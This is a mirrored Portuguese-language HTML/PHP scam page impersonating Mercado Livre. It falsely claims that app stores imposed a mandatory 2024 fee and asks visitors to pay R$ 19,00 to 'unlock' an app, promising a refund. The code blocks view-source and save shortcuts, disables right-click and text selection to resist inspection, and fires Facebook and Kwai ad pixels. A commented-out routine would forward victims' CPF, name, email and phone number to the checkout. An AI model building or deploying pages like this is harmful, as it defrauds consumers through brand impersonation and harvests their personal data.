<!DOCTYPE html><html lang="pt-BR">
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <script type="text/javascript" async="" src="js/events.js"></script>
    <script type="text/javascript" async="" src="js/events.js"></script>
    <script type="text/javascript" async="" src="js/events_1.js"></script>
    <script type="text/javascript" async="" src="js/events_4.js"></script>
    <script type="text/javascript" async="" src="js/events_4.js"></script>
    <script type="text/javascript" async="" src="js/events_2.js"></script>
    <script type="text/javascript" async="" src="js/events_3.js"></script>
    <script async="" src="js/fbevents.html"></script>
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
    <meta charset="UTF-8">
    <link href="css/bootstrap.min-25.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
<?php
include('../../nlo-config.php');
echo $pixel_scripts;

if($track_fb_pixel == 1){ ?>
<!-- Meta Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src='https://connect.facebook.net/en_US/fbevents.js';
  s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script');

  fbq('init', '<?php echo $fb_pixel; ?>'); // Substitua com o ID do seu pixel
  fbq('track', 'PageView');
</script>
<noscript>
  <img height="1" width="1" style="display:none"
       src="https://www.facebook.com/tr?id=<?php echo $fb_pixel; ?>&ev=PageView&noscript=1"/>
</noscript>
<!-- End Meta Pixel Code -->
<?php }; ?>
    <style>
      .header {
        background: WHITE;
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        grid-area: top-bar;
      }
      .main-content {
        max-width: 450px;
        background-color: white;
        text-align: center;
        padding: 2rem 2rem 1rem 2rem;
        border-radius: 10px;
        box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
        margin: 0 auto;
      }
      .main-content h2 {
        margin-bottom: 20px;
      }
      .btn-custom {
        color: white;
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #ff6c2c;
        font-weight: 500;
        border-radius: 1rem;
        padding: 0.75rem 3rem;
        letter-spacing: 0.3px;
        line-height: 1.15;
      }
      .btn-custom:hover {
        color: black !important;
        background-color: #ff6c2c !important;
        transform: scale(1.02) !important;
      }

      .footer {
        background-color: #ffffff;
        border-top: solid 1px #e6dddd;
        color: #000;
        text-align: center;
        width: 100%;
        bottom: 0;
        grid-area: footer;
        border-bottom: solid 3px #ffd900;
        padding: 2rem 0.5rem;
        position: relative;
        margin-top: 50px;
      }

      #conclusao {
        display: none; /* Esconde o elemento por padrão */
      }

      #conclusao h4 {
        color: green; /* Define a cor do texto */
        font-weight: bold; /* Define o texto em negrito */
      }

      .char {
        border-top: solid px #00adca;
        background-color: #00adca;
        padding: 2px !important;
      } /* End custom CSS */
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("keydown", bloquearSource);
      } else {
        //Versões antigas do IE
        document.attachEvent("onkeydown", bloquearSource);
      }

      function bloquearSource(e) {
        e = e || window.event;

        var code = e.which || e.keyCode;

        if (
          e.ctrlKey &&
          (code == 83 || code == 85) //83 = S, 85 = U
        ) {
          if (e.preventDefault) {
            e.preventDefault();
          } else {
            e.returnValue = false;
          }

          return false;
        }
      }
    </script>
    <style>
      /*desabilita a seleção no body*/
      body {
        -webkit-touch-callout: none; /* iOS Safari */
        -webkit-user-select: none; /* Chrome/Safari/Opera */
        -khtml-user-select: none; /* Konqueror */
        -moz-user-select: none; /* Firefox */
        -ms-user-select: none; /* Internet Explorer/Edge */
        user-select: none;
      }

      /*habilita a seleção nos campos editaveis*/
      input,
      textarea {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: text; /* Chrome/Safari/Opera */
        -khtml-user-select: text; /* Konqueror */
        -moz-user-select: text; /* Firefox */
        -ms-user-select: text; /* Internet Explorer/Edge */
        user-select: text;
      }

      /*habilita a seleção nos campos com o atributo contenteditable*/
      [contenteditable="true"] {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: all; /* Chrome/Safari/Opera */
        -khtml-user-select: all; /* Konqueror */
        -moz-user-select: all; /* Firefox */
        -ms-user-select: all; /* Internet Explorer/Edge */
        user-select: all;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("contextmenu", function (e) {
          e.preventDefault();
          return false;
        });
      } else {
        //Versões antigas do IE
        document.attachEvent("oncontextmenu", function (e) {
          e = e || window.event;
          e.returnValue = false;
          return false;
        });
      }
    </script>

    <!-- Google tag (gtag.js) -->
    <!-- <script async="" src="js-28"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag() {
        dataLayer.push(arguments);
      }
      gtag("js", new Date());

      gtag("config", "AW-16692136603");
    </script> -->

    <!-- <script>
      !(function (e, t) {
        "object" == typeof exports && "object" == typeof module
          ? (module.exports = t())
          : "function" == typeof define && define.amd
          ? define([], t)
          : "object" == typeof exports
          ? (exports.install = t())
          : (e.install = t());
      })(window, function () {
        return (function (e) {
          var t = {};
          function n(o) {
            if (t[o]) return t[o].exports;
            var r = (t[o] = { i: o, l: !1, exports: {} });
            return e[o].call(r.exports, r, r.exports, n), (r.l = !0), r.exports;
          }
          return (
            (n.m = e),
            (n.c = t),
            (n.d = function (e, t, o) {
              n.o(e, t) ||
                Object.defineProperty(e, t, { enumerable: !0, get: o });
            }),
            (n.r = function (e) {
              "undefined" != typeof Symbol &&
                Symbol.toStringTag &&
                Object.defineProperty(e, Symbol.toStringTag, {
                  value: "Module",
                }),
                Object.defineProperty(e, "__esModule", { value: !0 });
            }),
            (n.t = function (e, t) {
              if ((1 & t && (e = n(e)), 8 & t)) return e;
              if (4 & t && "object" == typeof e && e && e.__esModule) return e;
              var o = Object.create(null);
              if (
                (n.r(o),
                Object.defineProperty(o, "default", {
                  enumerable: !0,
                  value: e,
                }),
                2 & t && "string" != typeof e)
              )
                for (var r in e)
                  n.d(
                    o,
                    r,
                    function (t) {
                      return e[t];
                    }.bind(null, r)
                  );
              return o;
            }),
            (n.n = function (e) {
              var t =
                e && e.__esModule
                  ? function () {
                      return e.default;
                    }
                  : function () {
                      return e;
                    };
              return n.d(t, "a", t), t;
            }),
            (n.o = function (e, t) {
              return Object.prototype.hasOwnProperty.call(e, t);
            }),
            (n.p = ""),
            n((n.s = 0))
          );
        })([
          function (e, t, n) {
            "use strict";
            var o =
              (this && this.__spreadArray) ||
              function (e, t, n) {
                if (n || 2 === arguments.length)
                  for (var o, r = 0, i = t.length; r < i; r++)
                    (!o && r in t) ||
                      (o || (o = Array.prototype.slice.call(t, 0, r)),
                      (o[r] = t[r]));
                return e.concat(o || Array.prototype.slice.call(t));
              };
            Object.defineProperty(t, "__esModule", { value: !0 });
            var r = function (e, t, n) {
              var o,
                i = e.createElement("script");
              (i.type = "text/javascript"),
                (i.async = !0),
                (i.src = t),
                n &&
                  (i.onerror = function () {
                    r(e, n);
                  });
              var a = e.getElementsByTagName("script")[0];
              null === (o = a.parentNode) ||
                void 0 === o ||
                o.insertBefore(i, a);
            };
            !(function (e, t, n) {
              e.KwaiAnalyticsObject = n;
              var i = (e[n] = e[n] || []);
              i.methods = [
                "page",
                "track",
                "identify",
                "instances",
                "debug",
                "on",
                "off",
                "once",
                "ready",
                "alias",
                "group",
                "enableCookie",
                "disableCookie",
              ];
              var a = function (e, t) {
                e[t] = function () {
                  for (var n = [], r = 0; r < arguments.length; r++)
                    n[r] = arguments[r];
                  var i = o([t], n, !0);
                  e.push(i);
                };
              };
              i.methods.forEach(function (e) {
                a(i, e);
              }),
                (i.instance = function (e) {
                  var t,
                    n =
                      (null === (t = i._i) || void 0 === t ? void 0 : t[e]) ||
                      [];
                  return (
                    i.methods.forEach(function (e) {
                      a(n, e);
                    }),
                    n
                  );
                }),
                (i.load = function (e, o) {
                  var a =
                    "../../../../s1.kwai.net/kos/s101/nlav11187/pixel/events.js";
                  (i._i = i._i || {}),
                    (i._i[e] = []),
                    (i._i[e]._u = a),
                    (i._t = i._t || {}),
                    (i._t[e] = +new Date()),
                    (i._o = i._o || {}),
                    (i._o[e] = o || {});
                  var c = "?sdkid=".concat(e, "&lib=").concat(n);
                  r(
                    t,
                    a + c,
                    "../../../../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js" +
                      c
                  );
                });
            })(window, document, "kwaiq");
          },
        ]);
      });
    </script>
    <script>
      kwaiq.load("510449167530721283");
      kwaiq.page();
    </script> -->

    <!-- <script>
      !(function (e, t) {
        "object" == typeof exports && "object" == typeof module
          ? (module.exports = t())
          : "function" == typeof define && define.amd
          ? define([], t)
          : "object" == typeof exports
          ? (exports.install = t())
          : (e.install = t());
      })(window, function () {
        return (function (e) {
          var t = {};
          function n(o) {
            if (t[o]) return t[o].exports;
            var r = (t[o] = { i: o, l: !1, exports: {} });
            return e[o].call(r.exports, r, r.exports, n), (r.l = !0), r.exports;
          }
          return (
            (n.m = e),
            (n.c = t),
            (n.d = function (e, t, o) {
              n.o(e, t) ||
                Object.defineProperty(e, t, { enumerable: !0, get: o });
            }),
            (n.r = function (e) {
              "undefined" != typeof Symbol &&
                Symbol.toStringTag &&
                Object.defineProperty(e, Symbol.toStringTag, {
                  value: "Module",
                }),
                Object.defineProperty(e, "__esModule", { value: !0 });
            }),
            (n.t = function (e, t) {
              if ((1 & t && (e = n(e)), 8 & t)) return e;
              if (4 & t && "object" == typeof e && e && e.__esModule) return e;
              var o = Object.create(null);
              if (
                (n.r(o),
                Object.defineProperty(o, "default", {
                  enumerable: !0,
                  value: e,
                }),
                2 & t && "string" != typeof e)
              )
                for (var r in e)
                  n.d(
                    o,
                    r,
                    function (t) {
                      return e[t];
                    }.bind(null, r)
                  );
              return o;
            }),
            (n.n = function (e) {
              var t =
                e && e.__esModule
                  ? function () {
                      return e.default;
                    }
                  : function () {
                      return e;
                    };
              return n.d(t, "a", t), t;
            }),
            (n.o = function (e, t) {
              return Object.prototype.hasOwnProperty.call(e, t);
            }),
            (n.p = ""),
            n((n.s = 0))
          );
        })([
          function (e, t, n) {
            "use strict";
            var o =
              (this && this.__spreadArray) ||
              function (e, t, n) {
                if (n || 2 === arguments.length)
                  for (var o, r = 0, i = t.length; r < i; r++)
                    (!o && r in t) ||
                      (o || (o = Array.prototype.slice.call(t, 0, r)),
                      (o[r] = t[r]));
                return e.concat(o || Array.prototype.slice.call(t));
              };
            Object.defineProperty(t, "__esModule", { value: !0 });
            var r = function (e, t, n) {
              var o,
                i = e.createElement("script");
              (i.type = "text/javascript"),
                (i.async = !0),
                (i.src = t),
                n &&
                  (i.onerror = function () {
                    r(e, n);
                  });
              var a = e.getElementsByTagName("script")[0];
              null === (o = a.parentNode) ||
                void 0 === o ||
                o.insertBefore(i, a);
            };
            !(function (e, t, n) {
              e.KwaiAnalyticsObject = n;
              var i = (e[n] = e[n] || []);
              i.methods = [
                "page",
                "track",
                "identify",
                "instances",
                "debug",
                "on",
                "off",
                "once",
                "ready",
                "alias",
                "group",
                "enableCookie",
                "disableCookie",
              ];
              var a = function (e, t) {
                e[t] = function () {
                  for (var n = [], r = 0; r < arguments.length; r++)
                    n[r] = arguments[r];
                  var i = o([t], n, !0);
                  e.push(i);
                };
              };
              i.methods.forEach(function (e) {
                a(i, e);
              }),
                (i.instance = function (e) {
                  var t,
                    n =
                      (null === (t = i._i) || void 0 === t ? void 0 : t[e]) ||
                      [];
                  return (
                    i.methods.forEach(function (e) {
                      a(n, e);
                    }),
                    n
                  );
                }),
                (i.load = function (e, o) {
                  var a =
                    "../../../../s1.kwai.net/kos/s101/nlav11187/pixel/events.js";
                  (i._i = i._i || {}),
                    (i._i[e] = []),
                    (i._i[e]._u = a),
                    (i._t = i._t || {}),
                    (i._t[e] = +new Date()),
                    (i._o = i._o || {}),
                    (i._o[e] = o || {});
                  var c = "?sdkid=".concat(e, "&lib=").concat(n);
                  r(
                    t,
                    a + c,
                    "../../../../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js" +
                      c
                  );
                });
            })(window, document, "kwaiq");
          },
        ]);
      });
    </script>
    <script>
      kwaiq.load("261106540113615");
      kwaiq.page();
    </script>
    <script>
      !(function (e, t) {
        "object" == typeof exports && "object" == typeof module
          ? (module.exports = t())
          : "function" == typeof define && define.amd
          ? define([], t)
          : "object" == typeof exports
          ? (exports.install = t())
          : (e.install = t());
      })(window, function () {
        return (function (e) {
          var t = {};
          function n(o) {
            if (t[o]) return t[o].exports;
            var r = (t[o] = { i: o, l: !1, exports: {} });
            return e[o].call(r.exports, r, r.exports, n), (r.l = !0), r.exports;
          }
          return (
            (n.m = e),
            (n.c = t),
            (n.d = function (e, t, o) {
              n.o(e, t) ||
                Object.defineProperty(e, t, { enumerable: !0, get: o });
            }),
            (n.r = function (e) {
              "undefined" != typeof Symbol &&
                Symbol.toStringTag &&
                Object.defineProperty(e, Symbol.toStringTag, {
                  value: "Module",
                }),
                Object.defineProperty(e, "__esModule", { value: !0 });
            }),
            (n.t = function (e, t) {
              if ((1 & t && (e = n(e)), 8 & t)) return e;
              if (4 & t && "object" == typeof e && e && e.__esModule) return e;
              var o = Object.create(null);
              if (
                (n.r(o),
                Object.defineProperty(o, "default", {
                  enumerable: !0,
                  value: e,
                }),
                2 & t && "string" != typeof e)
              )
                for (var r in e)
                  n.d(
                    o,
                    r,
                    function (t) {
                      return e[t];
                    }.bind(null, r)
                  );
              return o;
            }),
            (n.n = function (e) {
              var t =
                e && e.__esModule
                  ? function () {
                      return e.default;
                    }
                  : function () {
                      return e;
                    };
              return n.d(t, "a", t), t;
            }),
            (n.o = function (e, t) {
              return Object.prototype.hasOwnProperty.call(e, t);
            }),
            (n.p = ""),
            n((n.s = 0))
          );
        })([
          function (e, t, n) {
            "use strict";
            var o =
              (this && this.__spreadArray) ||
              function (e, t, n) {
                if (n || 2 === arguments.length)
                  for (var o, r = 0, i = t.length; r < i; r++)
                    (!o && r in t) ||
                      (o || (o = Array.prototype.slice.call(t, 0, r)),
                      (o[r] = t[r]));
                return e.concat(o || Array.prototype.slice.call(t));
              };
            Object.defineProperty(t, "__esModule", { value: !0 });
            var r = function (e, t, n) {
              var o,
                i = e.createElement("script");
              (i.type = "text/javascript"),
                (i.async = !0),
                (i.src = t),
                n &&
                  (i.onerror = function () {
                    r(e, n);
                  });
              var a = e.getElementsByTagName("script")[0];
              null === (o = a.parentNode) ||
                void 0 === o ||
                o.insertBefore(i, a);
            };
            !(function (e, t, n) {
              e.KwaiAnalyticsObject = n;
              var i = (e[n] = e[n] || []);
              i.methods = [
                "page",
                "track",
                "identify",
                "instances",
                "debug",
                "on",
                "off",
                "once",
                "ready",
                "alias",
                "group",
                "enableCookie",
                "disableCookie",
              ];
              var a = function (e, t) {
                e[t] = function () {
                  for (var n = [], r = 0; r < arguments.length; r++)
                    n[r] = arguments[r];
                  var i = o([t], n, !0);
                  e.push(i);
                };
              };
              i.methods.forEach(function (e) {
                a(i, e);
              }),
                (i.instance = function (e) {
                  var t,
                    n =
                      (null === (t = i._i) || void 0 === t ? void 0 : t[e]) ||
                      [];
                  return (
                    i.methods.forEach(function (e) {
                      a(n, e);
                    }),
                    n
                  );
                }),
                (i.load = function (e, o) {
                  var a =
                    "../../../../s1.kwai.net/kos/s101/nlav11187/pixel/events.js";
                  (i._i = i._i || {}),
                    (i._i[e] = []),
                    (i._i[e]._u = a),
                    (i._t = i._t || {}),
                    (i._t[e] = +new Date()),
                    (i._o = i._o || {}),
                    (i._o[e] = o || {});
                  var c = "?sdkid=".concat(e, "&lib=").concat(n);
                  r(
                    t,
                    a + c,
                    "../../../../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js" +
                      c
                  );
                });
            })(window, document, "kwaiq");
          },
        ]);
      });
    </script>
    <script>
      kwaiq.load("261106540113615");
      kwaiq.page();
      kwaiq.track("purchase");
    </script> -->
  </head>

  <body>
    <div style="
        display: grid;
        grid-template-areas:
          'top-bar'
          'content'
          'footer';
        grid-template-rows: auto 1fr auto;
        min-height: 100vh;
      ">
      <div class="header">
        <img decoding="async" style="width: 120px" src="images/VERIZON.png" alt="Imagem Centralizada" data-lazy-src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img
            decoding="async"
            style="width: 120px"
            src="lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000-12.html"
            alt="Imagem Centralizada"
        /></noscript>
      </div>

      <div style="grid-area: content; padding: 0 1rem">
        <div style="margin-top: 40px" class="main-content text-center">
          <h1 style="color: #ff2424">Perfeito! Vamos lá...</h1>
          <p>
            No ano de 2024 as lojas de aplicativos
            <strong>(PlayStore e AppStore)</strong> criaram uma tarifa
            obrigatória para toda instituição financeira que possui atuação no
            Brasil, que é nosso caso. Esta tarifa tem o objetivo de inibir
            possíveis fraudes.
          </p>
          <p>
            Nós da <strong>Mercado Livre</strong> não achamos justo ser cobrado
            este valor de nossos clientes, por isso todo valor pago nesta tarifa
            será reembolsado na sua <strong>Conta Digital Mercado Livre</strong>.
          </p>

          <div class="card p-3 my-4">
            <p style="font-weight: 600">
              Não se preocupe, este valor estará disponível na sua conta
              digital, assim que você baixar seu aplicativo.
            </p>
            <p>
              O link para baixar o App será liberado imediatamente após o
              pagamento.
            </p>

            <div class="text-center"></div>
          </div>

          <h3 class="text-pink"><strong>R$ 19,00</strong></h3>
          <button type="button" id="ativarConta" class="btn btn-custom rounded-pill w-100 mt-3" onclick="redirecionar()">
            Quero baixar meu aplicativo
          </button>

          <script>
            function getUrlParams() {
              const params = {};
              const queryString = window.location.search;
              const urlParams = new URLSearchParams(queryString);
              
              for (const [key, value] of urlParams) {
                params[key] = value;
              }
              return params;
            }

            function getUTMParams() {
              return getUrlParams();
            }

            function buildUrlWithParams(baseUrl) {
              const params = getUrlParams();
              const url = new URL(baseUrl, window.location.href);
              Object.keys(params).forEach(key => {
                url.searchParams.append(key, params[key]);
              });
              
              return url.toString();
            }

        	// Função para capturar os parâmetros GET da URL atual
        	function getUrlParams() {
        		const params = new URLSearchParams(window.location.search);
        		let paramsObject = {};
        		params.forEach((value, key) => {
        			paramsObject[key] = value;
        		});
        		return paramsObject;
        	}
        
        	//reescrever redirects pra incluir parametros
        	function redirectWithParams(baseUrl) {
        		const params = getUrlParams();
        		const url = new URL(baseUrl, window.location);
        
        		Object.keys(params).forEach(key => {
        			url.searchParams.set(key, params[key]);
        		});
        
        		window.location.href = url.toString();
        	}

            function redirecionar() {
                /*
              try {
                const dadosUsuario = JSON.parse(localStorage.getItem("dadosCPF"));
                if (dadosUsuario === null) {
                  window.location.href = buildUrlWithParams("../checkout?up=4");
                  return;
                }
                const whatsapp = localStorage.getItem("whatsapp");
                const nomeCompleto = dadosUsuario.nomeCompleto;
                const cpfCompleto = dadosUsuario.cpf;
                const emailCompleto = dadosUsuario.email;

                const baseUrl = `../checkout?up=4&nome=${nomeCompleto}&telefone=${whatsapp}&cpf=${cpfCompleto}&email=${emailCompleto}`;
                const finalUrl = buildUrlWithParams(baseUrl);
                
                window.location.href = finalUrl;
              } catch(err) {
                console.error('Erro ao redirecionar:', err);
                window.location.href = buildUrlWithParams("../checkout?up=4");
              } */
                redirectWithParams("../../checkout?up=4");
            }
          </script>
        </div>
      </div>

      <div class="footer py-4" id="footerChg">
  © 2024 Mercado Livre. CNPJ 68.694.585/0001-20. Av. Brig. Faria Lima, 1811,
  São Paulo/SP
      </div>
    </div>

    <!-- <script>
      window.pixelId = "678b8bece4044792a776a32f";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.setAttribute("src", "../../../../cdn.utmify.com.br/scripts/pixel/pixel.js");
      document.head.appendChild(a);
    </script> -->

</body>
</html>